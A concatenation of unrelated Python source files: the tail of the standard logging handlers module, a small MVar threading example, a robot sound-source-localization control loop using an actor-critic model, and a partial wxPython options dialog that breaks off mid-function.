self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
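# A minimal usage sketch for SMTPHandler (the host, addresses and
# credentials below are placeholders, not working values):
#
#     handler = SMTPHandler(mailhost=('smtp.example.com', 587),
#                           fromaddr='app@example.com',
#                           toaddrs=['ops@example.com'],
#                           subject='Application error',
#                           credentials=('user', 'secret'),
#                           secure=())
#     handler.setLevel(logging.ERROR)
#     logging.getLogger('myapp').addHandler(handler)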
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
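# A minimal usage sketch for HTTPHandler (host and path are placeholders;
# the endpoint must accept the record's fields as form-encoded data):
#
#     handler = HTTPHandler('localhost:8080', '/log', method='POST')
#     logging.getLogger('myapp').addHandler(handler)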
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
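# A minimal usage sketch for MemoryHandler: buffer up to 100 records and
# flush them to a StreamHandler as soon as an ERROR-level record arrives:
#
#     target = logging.StreamHandler()
#     handler = MemoryHandler(capacity=100, flushLevel=logging.ERROR,
#                             target=target)
#     logging.getLogger('myapp').addHandler(handler)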
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
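# A minimal sketch of the QueueHandler/QueueListener pairing (shown with a
# plain queue.Queue for brevity; with multiprocessing, create the queue in
# the parent process and pass it to the children):
#
#     import queue
#     q = queue.Queue()
#     listener = QueueListener(q, logging.StreamHandler())
#     listener.start()
#     logging.getLogger('myapp').addHandler(QueueHandler(q))
#     ...   # log as usual; records are handled on the listener thread
#     listener.stop()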
|
example.py
|
# Copyright (c) 2018 Gabriele Baldoni.
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
# which is available at https://www.apache.org/licenses/LICENSE-2.0.
#
# SPDX-License-Identifier: Apache-2.0
#
# Contributors: Gabriele Baldoni MVar implementation in Python
import time
from threading import Thread
from random import randint
from mvar import MVar
def worker(var):
time.sleep(randint(1, 3))
var.put(1)
def worker2(var):
var.put(3)
print('Starting Worker1 and waiting on the MVar for the result...')
local_var = MVar()
Thread(target=worker, args=(local_var,), daemon=True).start()
res = local_var.take()
print("Worker1 returned {}".format(res))
print("Putting a value on the MVar to block Worker2")
local_var.put(2)
print('Starting Worker2...')
Thread(target=worker2, args=(local_var,), daemon=True).start()
res2 = local_var.take()
print("Getting previous value stored in MVar to"
"unlock Worker2 - MVar.take() returned {}".format(res2))
res3 = local_var.take()
print("Worker3 returned {}".format(res3))
|
ssl_loop_backup.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
loop thread to run ssl
"""
from SoundSourceLocalization.ssl_setup import *
from SoundSourceLocalization.ssl_gcc_generator import GccGenerator
from SoundSourceLocalization.ssl_actor_critic import Actor, Critic
from SoundSourceLocalization.ssl_map import Map
from SoundSourceLocalization.ssl_audio_processor import *
from SoundSourceLocalization.ssl_turning import SSLturning
from SoundSourceLocalization.kws_detector import KwsDetector
import time
import sys
import os
import threading
import random
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import Driver.ControlOdometryDriver as CD
class SSL:
def __init__(self):
print(" === init SSL part ")
# self.KWS = KwsDetector(CHUNK, RECORD_DEVICE_NAME, RECORD_WIDTH, CHANNELS,
# SAMPLE_RATE, FORMAT, KWS_WAVE_PATH, KWS_MODEL_PATH, KWS_LABEL_PATH)
def loop(self, event, control, source='test'):
device_index = -1
p = pyaudio.PyAudio()
"""
Recognize Mic device, before loop
"""
# scan to get usb device
print(p.get_device_count())
for index in range(0, p.get_device_count()):
info = p.get_device_info_by_index(index)
device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(RECORD_DEVICE_NAME) != -1:
device_index = index
# break
if device_index != -1:
print("find the device")
print(p.get_device_info_by_index(device_index))
else:
print("don't find the device")
exit()
saved_count = 0
gccGenerator = GccGenerator()
map = Map()
# fixme, set start position
map.walker_pos_x = 1.3
map.walker_pos_z = 3.3
map.walker_face_to = 0
# 1.0, 1.85, 0
# -3.1, 0.9, 90
# -2.1, 0.9, 90
actor = Actor(GCC_BIAS, ACTION_SPACE, lr=0.004)
critic = Critic(GCC_BIAS, ACTION_SPACE, lr=0.003, gamma=0.95)
actor.load_trained_model(MODEL_PATH)
# init at the first step
state_last = None
action_last = None
direction_last = None
DE_NOISE = False
# steps
while True:
event.wait()
print("===== %d =====" % saved_count)
map.print_walker_status()
map.detect_which_region()
final_file = None
"""
Record
"""
            # todo, block here for keyword spotting (KWS)
if saved_count == 0:
print("congest in KWS ...")
self.KWS.slide_win_loop()
wakeup_wav = self.KWS.RANDOM_PREFIX + "win.wav"
denoise_file = str(saved_count) + "_de.wav"
de_noise(os.path.join(self.KWS.WAV_PATH, wakeup_wav), os.path.join(self.KWS.WAV_PATH, denoise_file))
if DE_NOISE is False:
final_file = wakeup_wav
else:
final_file = denoise_file
else:
# active detection
print("start monitoring ... ")
while True:
event.wait()
# print("start monitoring2 ... ")
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(RECORD_WIDTH),
channels=CHANNELS,
rate=SAMPLE_RATE,
input=True,
input_device_index=device_index)
# 16 data
frames = []
for i in range(0, int(SAMPLE_RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
# print("here")
frames.append(data)
# print(len(frames))
stream.stop_stream()
stream.close()
p.terminate()
# print("End monitoring ... ")
# temp store into file
wave_output_filename = str(saved_count) + ".wav"
wf = wave.open(os.path.join(WAV_PATH, wave_output_filename), 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(RECORD_WIDTH)
wf.setframerate(SAMPLE_RATE)
wf.writeframes(b''.join(frames))
wf.close()
# todo, de-noise into new file, then VAD and split
noise_file = wave_output_filename
denoise_file = str(saved_count) + "_de.wav"
de_noise(os.path.join(WAV_PATH, noise_file), os.path.join(WAV_PATH, denoise_file))
                # if activity is detected, break; split and process, then act. Resume monitoring after the action is done.
if DE_NOISE is False:
final_file = noise_file
else:
final_file = denoise_file
if judge_active(os.path.join(WAV_PATH, final_file)) is True:
print("Detected ... ")
break
"""
Split
"""
if saved_count == 0:
split_channels(os.path.join(self.KWS.WAV_PATH, final_file))
else:
split_channels(os.path.join(WAV_PATH, final_file))
"""
            use the four mic files as input to produce an action
"""
print("producing action ...")
# fixme, change debug model if mic change
if saved_count == 0:
gcc = gccGenerator.cal_gcc_online(self.KWS.WAV_PATH, saved_count, type='Bias', debug=False, denoise=DE_NOISE, special_wav=final_file)
else:
gcc = gccGenerator.cal_gcc_online(WAV_PATH, saved_count, type='Bias', debug=False, denoise=DE_NOISE)
state = np.array(gcc)[np.newaxis, :]
print("GCC Bias :", gcc)
            # todo, define invalids based on the constructed map and restricted regions
invalids_dire = map.detect_invalid_directions()
print("invalids_dire of walker: ", invalids_dire)
# transform walker direction to mic direction
invalids_idx = [(i + 45) % 360 / 45 for i in invalids_dire]
print("invalids_idx of mic: ", invalids_idx)
# set invalids_idx in real test
action, _ = actor.output_action(state, invalids_idx)
print("prob of mic: ", _)
# transform mic direction to walker direction
direction = (action + 6) % 7 * 45
# bias is 45 degree, ok
print("Estimated direction of walker : ", direction)
# fixme, for test or hard code, cover direction
# direction = int(input())
print("Applied direction of walker :", direction)
# todo, set different rewards and learn
if saved_count > 0:
reward = None
if source == '0':
max_angle = max(float(direction), float(direction_last))
min_angle = min(float(direction), float(direction_last))
diff = min(abs(max_angle - min_angle), 360 - max_angle + min_angle)
reward = 1 - diff / 180
print("single room 's reward is :" + str(reward))
# td = critic.learn(state_last, reward, state)
# actor.learn(state_last, action_last, td)
elif source == '1':
reward = 1 - map.cal_distance_region(1) / 9
print("src 1 's reward is :", reward)
td = critic.learn(state_last, reward, state)
actor.learn(state_last, action_last, td)
elif source == '4':
reward = 1 - map.cal_distance_region(4) / 3
print("src 4 's reward is :", reward)
td = critic.learn(state_last, reward, state)
actor.learn(state_last, action_last, td)
state_last = state
direction_last = direction
# transfer given direction into action index, based on taken direction
action_last = (direction + 45) % 360 / 45
print("apply movement ...")
SSLturning(control, direction)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
map.update_walker_pos(direction)
saved_count += 1
            # save the online model if the source is reached; re-choose the actor model path if needed
if source == "0":
if 3 <= map.walker_pos_x <= 3.2 and 6.5 <= map.walker_pos_z <= 7.5:
actor.saver.save(actor.sess, ONLINE_MODEL_PATH)
elif source == "1":
if 3.5 <= map.walker_pos_x and map.walker_pos_z >= 6:
actor.saver.save(actor.sess, ONLINE_MODEL_PATH)
if __name__ == '__main__':
ssl = SSL()
cd = CD.ControlDriver()
temp = threading.Event()
temp.set()
p2 = threading.Thread(target=cd.control_part, args=())
p1 = threading.Thread(target=ssl.loop, args=(temp,cd,))
p2.start()
p1.start()
|
needswx.py
|
import sys, os, os.path, fnmatch, types, threading, time
import re, copy, StringIO, csv, math, pickle
from optparse_gui import OptionParser, UserCancelledError, Progress
import optparse
from ConfigParser import ConfigParser
import wx
from wx.lib.filebrowsebutton import FileBrowseButton
def quotedifnec(f):
if ' ' in f:
return '"%s"'%f
return f
def quotedlistifnec(lf):
retval = []
for f in lf:
retval.append(quotedifnec(f))
return " ".join(retval)
class MyFileBrowseButton( FileBrowseButton ):
def __init__(self,*args,**kw):
if 'dotfile' in kw:
self.dotfile = kw['dotfile']
del kw['dotfile']
if 'key' in kw:
self.key = kw['key']
del kw['key']
self.isdir = False
if 'isdir' in kw:
self.isdir = kw['isdir']
del kw['isdir']
super(MyFileBrowseButton,self).__init__(*args,**kw)
def createDialog( self, parent, id, pos, size, style, name="" ):
"""Setup the graphic representation of the dialog"""
wx.Panel.__init__ (self, parent, id, pos, size, style, name )
self.SetMinSize(size) # play nice with sizers
box = wx.BoxSizer(wx.HORIZONTAL)
# self.label = self.createLabel( )
# box.Add( self.label, 0, wx.CENTER )
self.textControl = self.createTextControl()
box.Add( self.textControl, 1, wx.CENTER, 5)
self.browseButton = self.createBrowseButton()
box.Add( self.browseButton, 0, wx.LEFT|wx.CENTER, 5)
self.SetAutoLayout(True)
self.SetSizer( box )
self.Layout()
if type( size ) == types.TupleType:
size = apply( wx.Size, size)
self.SetDimensions(-1, -1, size.width, size.height, wx.SIZE_USE_EXISTING)
def OnBrowse (self, event = None):
""" Going to browse for file... """
current = self.GetValue()
s = StringIO.StringIO(current)
rr = csv.reader(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
try:
row = rr.next()
except StopIteration:
row = []
if len(row) > 0 and os.path.exists(row[0]):
directory,current = os.path.split(row[0])
if len(row) > 1:
current = []
for r in row:
current.append(os.path.split(r)[1])
current = ' '.join(map(quotedifnec,current))
current = ""
elif hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if config.has_section("LastFolder") and config.has_option("LastFolder",self.key):
directory = config.get("LastFolder",self.key)
else:
directory = self.startDirectory
current = ""
else:
directory = self.startDirectory
current = ""
if self.isdir:
dlg = wx.DirDialog(self, self.dialogTitle, directory,
self.fileMode)
else:
dlg = wx.FileDialog(self, self.dialogTitle, directory, current,
self.fileMask, self.fileMode)
if dlg.ShowModal() == wx.ID_OK:
s = StringIO.StringIO()
wr = csv.writer(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
if self.fileMode&wx.MULTIPLE:
wr.writerow(dlg.GetPaths())
dir = os.path.split(dlg.GetPaths()[0])[0]
else:
wr.writerow([dlg.GetPath()])
dir = os.path.split(dlg.GetPath())[0]
self.SetValue(s.getvalue().strip())
s.close()
if hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastFolder"):
config.add_section("LastFolder")
config.set("LastFolder",self.key,dir)
try:
wh = open(self.dotfile,'wb')
config.write(wh)
wh.close()
except IOError:
pass
dlg.Destroy()
class OptparseDialog( wx.Dialog ):
'''The dialog presented to the user with dynamically generated controls,
to fill in the required options.
Based on the wx.Dialog sample from wx Docs & Demos'''
def __init__(
self,
option_parser, #The OptionParser object
parent = None,
ID = 0,
title = 'Program Options',
pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE,
name = 'OptparseDialog',
values = None,
args = False
):
self.option_parser = option_parser
if values == None:
values = option_parser.get_defaults()
provider = wx.SimpleHelpProvider()
wx.HelpProvider_Set(provider)
pre = wx.PreDialog()
pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
pre.Create(parent, ID, title, pos, size, style)
self.PostCreate(pre)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer2 = wx.BoxSizer(wx.HORIZONTAL)
top_label_text = '%s %s' % ( "".join(option_parser.get_prog_name().split("\\")).split(".")[0],
option_parser.get_version() )
label = wx.StaticText(self, -1, top_label_text)
sizer2.Add(label, 0, wx.GROW|wx.ALIGN_LEFT|wx.ALL, 5)
if wx.Platform != "__WXMSW__":
sizer2.AddStretchSpacer(-1)
btn = wx.ContextHelpButton(self)
sizer2.Add(btn, 0, wx.ALIGN_RIGHT|wx.ALL)
sizer.Add(sizer2,0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
nb = wx.Notebook(self, wx.ID_ANY)
self.option_controls = {}
self.option_controls.update(self.set_panel(nb,option_parser.option_list,values,'Options'))
for g in option_parser.option_groups:
self.option_controls.update(self.set_panel(nb,g.option_list,values,g.title))
if args:
self.args_ctrl = self.set_args_panel(nb,values,'Arguments')
else:
self.args_ctrl = None
sizer.Add(nb, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
btnsizer = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_CANCEL)
# btn.SetHelpText("The OK button completes the dialog")
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer((100,-1))
btn = wx.Button(self, wx.ID_CLEAR, label="Reset")
btn.Bind(wx.EVT_BUTTON, self.closeDialog)
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer((100,-1))
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
# btn.SetHelpText("The Cancel button cancels the dialog.")
btnsizer.Add(btn,0,wx.ALL,5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER,wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def closeDialog(self,event):
self.state = 'Reset'
self.Close()
def set_panel(self,parent,opts,values,title):
nopt = len(opts)
s = wx.FlexGridSizer(nopt,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
return self.add_opts(opts,values,p,s)
def set_args_panel(self,parent,values,title):
s = wx.FlexGridSizer(1,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
label = wx.StaticText(p, -1, 'Arguments' )
label.SetHelpText( 'Free-form arguments.' )
ctrl = wx.TextCtrl( p, -1, '', size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
ctrl.SetHelpText(
'''Args can either be separated by a space or a newline
            Args that contain spaces must be entered like so: "arg with space"
'''
)
ctrl.Value = values['-args-']
s.Add( label, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )
s.Add( ctrl, 1, wx.ALIGN_LEFT | wx.ALL, 5 )
return ctrl
def add_opts(self,opts,values,parent,sizer):
controls = {}
for option in opts:
if option.dest is None:
continue
if option.help is None:
option.help = u''
if option.name is None:
option.name = option.dest.title()
label = wx.StaticText(parent, -1, option.name )
label.SetHelpText( option.help )
sizer.Add( label, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT|wx.ALL, 5 )
if 'file' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.OPEN|wx.FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'files' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
if isinstance(values.get(option.dest,""),basestring):
initStr = values.get(option.dest,"")
else:
initStr = str(' '.join(v if ' ' not in v else '"%s"'%v for v in values.get(option.dest,[])))
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.OPEN|wx.MULTIPLE|wx.FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=initStr)
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savefile' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.SAVE|wx.OVERWRITE_PROMPT,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savedir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'dir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'store' == option.action:
if 'choice' == option.type:
if optparse.NO_DEFAULT == option.default:
option.default = option.choices[0]
ctrl = wx.ComboBox(
parent, -1, choices = option.choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size=(300,-1)
)
try:
